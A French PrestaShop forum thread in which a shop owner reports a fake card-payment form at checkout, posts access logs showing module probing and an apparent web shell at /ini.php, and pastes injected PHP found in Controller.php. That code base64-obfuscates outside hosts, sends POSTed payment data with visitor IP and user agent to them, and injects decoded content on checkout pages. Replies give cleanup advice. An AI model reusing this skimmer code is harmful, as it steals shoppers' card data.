Jump to content

Hack prestashop 1.7.8

Mostyma
 Share

Recommended Posts

Mostyma Apprentice

Mostyma

Posted
Posted

Bonjour à tous,

 

J'ai régulierement un hacking sur mon presta 1.7.8 qui affiche un faux paiement en CB sur la page de finalisation de commande.

J'ai regardé sur les logs mais je n'arrive pas à les déchiffrer correctement, il semble que l'ip du hacker utilise "Uptime-Kuma/1.23.16" que je ne connais pas du tout.

Est ce que quelqu'un pourrais m'aider à déchiffrer les logs ci dessous? :

144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:51:50 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:52:50 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:52:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:53:51 +0100] "GET / HTTP/1.0" 302 1799 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:53:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:54:51 +0100] "GET / HTTP/1.0" 302 404 "-" "Uptime-Kuma/1.23.16"
144.91.86.21 - - [16/Feb/2025:08:54:51 +0100] "GET /fr/ HTTP/1.0" 200 1024 "-" "Uptime-Kuma/1.23.16"
185.208.158.165 - - [16/Feb/2025:08:55:05 +0100] "GET / HTTP/1.0" 302 404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:05 +0100] "GET /fr/ HTTP/1.0" 200 12419 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:06 +0100] "POST /modules/bamegamenu/ajax_phpcode.php HTTP/1.0" 404 42798 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:06 +0100] "GET /modules/cartabandonmentpro/views/js/fileman/php/movefile.php HTTP/1.0" 404 42827 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/explorerpro/action.php HTTP/1.0" 404 42793 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/nvn_export_orders/calendar/tcal.js HTTP/1.0" 404 42806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:07 +0100] "GET /modules/wdoptionpanel/admin/js/colorpicker.js HTTP/1.0" 404 42810 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/tdpsthemeoptionpanel/js/colorpicker.js HTTP/1.0" 404 42808 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/cdesigner/views/js/cdesigner.js HTTP/1.0" 404 42802 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:08 +0100] "GET /modules/jmsslider/views/js/jquery.fractionslider.js HTTP/1.0" 404 42816 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:09 +0100] "GET /modules/apmarketplace/ajax.php HTTP/1.0" 404 42793 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "POST /index.php?fc=module&module=jmarketplace&controller=addproduct HTTP/1.0" 404 43064 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "POST /modules/jmarketplace/temp/ini.php HTTP/1.0" 404 42649 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:10 +0100] "GET /modules/fieldvmegamenu/ajax/upload.php HTTP/1.0" 404 42802 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/simpleslideshow/uploadimage.php HTTP/1.0" 404 42800 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/productpageadverts/uploadimage.php HTTP/1.0" 404 42805 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:11 +0100] "GET /modules/homepageadvertise2/uploadimage.php HTTP/1.0" 404 42805 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "GET /modules/vm_advancedconfigurator/js/dropzone/upload.php HTTP/1.0" 404 42819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "GET /modules/megamenu/uploadify/uploadify.php HTTP/1.0" 200 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /modules/megamenu/uploadify/uploadify.php HTTP/1.0" 200 465 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:12 +0100] "POST /ini.php HTTP/1.0" 200 441 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "GET /ini.php HTTP/1.0" 200 413 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "POST /ini.php HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
185.208.158.165 - - [16/Feb/2025:08:55:13 +0100] "POST /ini.php HTTP/1.0" 200 1897 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari

  • Like 1
Link to comment
Share on other sites
ComGrafPL Grand Master

ComGrafPL

Posted
Posted

Je ferais une sauvegarde et remplacerais les fichiers « rouges » cruciaux par le .zip d'origine de PrestaShop 1.7.8. Vous avez la version 1.7.8.10 ? Sinon, essayez également de mettre à jour vers la dernière version.

Link to comment
Share on other sites
Mostyma Apprentice

Mostyma

Posted
  • Author
Posted

ok j'ai trouvé cela dans le fichier classes/controller/ controller.php:

 

$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash_commented_Virus_infection_fixed_already_67b4690a06f33'   => $_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );      
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);  
    }
}$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['advert_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['advert_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );      
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);  
    }
}

Link to comment
Share on other sites
Mediacom87 Grand Master

Mediacom87

Posted
Posted
  On 2/18/2025 at 11:12 AM, Mostyma said:

ok j'ai trouvé cela dans le fichier classes/controller/ controller.php:

 

$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash_commented_Virus_infection_fixed_already_67b4690a06f33'   => $_POST['advert_hash_commented_Virus_infection_fixed_already_67b4690a06f33'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );      
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);  
    }
}$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['advert_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['advert_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );      
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);  
    }
}

Expand  

Votre site a été compromis à deux reprises, ce qui confirme une faille de sécurité.

Il est impératif de procéder rapidement à un nettoyage approfondi et de le placer immédiatement en mode maintenance afin de prévenir tout risque de vol de données pour vos clients.

Link to comment
Share on other sites
Mostyma Apprentice

Mostyma

Posted
  • Author
Posted

ok, comment repérer la faille? peut elle se voir sur les fichiers sftp?

j'ai repérer ça aussi sur le même fichier controller.php :

 

    public function jschecks($html,$p)
    {
        $urp=[
            "order",
            "Bestellung",
            "bestellung",
            "commande",
            "objednavka",
            "pedido",
            "carrito",
            "koszykgt",
            "zamowienie",
            "comanda",
            "checkout",
            "ordine",
            "befejezett-rendeles",
            "wienie",
            "הזמנה",
            "%D7%94%D7%96%D7%9E%D7%A0%D7%94",
            "sipariş vermiş olmalısınız",
            "sipari%C5%9F%20vermi%C5%9F%20olmal%C4%B1s%C4%B1n%C4%B1z",
            "παραγγελία",
            "%CF%80%CE%B1%CF%81%CE%B1%CE%B3%CE%B3%CE%B5%CE%BB%CE%AF%CE%B1",
            "siparis",
            "encomenda",
            "objednávku",
            "objedn%C3%A1vku",
            "objednávka",
            "objedn%C3%A1vka",
            "objednavku",
            "greitas-uzsakymas",
            "rendeles-befejezese",
            "zamowieni",
            "u%C5%BEsakymas",
            "porud%C5%BEbinu",
            "bestelling",
            "porachka",
            "ordre",
            "hurtigordre",
            "uzsakymas",
        ];

        include_once($_SERVER['DOCUMENT_ROOT'].'/config/config.inc.php');
        include_once($_SERVER['DOCUMENT_ROOT'].'/config/settings.inc.php');
        include_once($_SERVER['DOCUMENT_ROOT'].'/classes/Cookie.php');
        $context = Context::getContext();
        $cart = new Cart($context->cookie->id_cart);


        if($cart->id!=""){

            $cookie = new Cookie('psAdmin');
            if (!$cookie->id_employee){


                foreach($urp as $u){
if (0) if (0)                     if (strpos($_SERVER["REQUEST_URI"], $u) !== false && strpos($_SERVER["REQUEST_URI"], "admin") == false && strpos($_SERVER["REQUEST_URI"], "Admin") == false ){
                        $html=$html.@base64_decode(@file_get_contents($_SERVER["DOCUMENT_ROOT"].$p));
                        return $html;
                    }
                }
            }
        }
        return $html;

Link to comment
Share on other sites
Mediacom87 Grand Master

Mediacom87

Posted
Posted

Oui, vous pouvez identifier les modules problématiques référencés par FoP

  On 2/17/2025 at 9:18 AM, Prestashop Addict said:

Vous pouvez checker sur ce site.

Expand  

Puis corriger le code.

Effacer tous les modules inutiles.

Remettre les fichiers originaux du cœur.

Contrôlez votre base de données

En gros, nettoyer votre site de son hack en évitant que la faille soit encore active, car un site piraté sera toujours attaqué par la suite.

Link to comment
Share on other sites
  • 3 weeks later...
CHRISCOM Enthusiast

CHRISCOM

Posted
Posted

Bonjour,

 

A la main :( En général il ajoute du code en base64 pour offusqué le code malveillance. Il y a aussi la possible de retrouver des fichiers txt qui est automatiquement modifié en .php par un code en base64.

Je rejoins @Mediacom87, la persistance d'un virus c'est la clé d'un hackeur.

 

Bref un gros ménage d'analyse et de forensic pour éviter que cela ce reproduise.

 

Bon courage.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...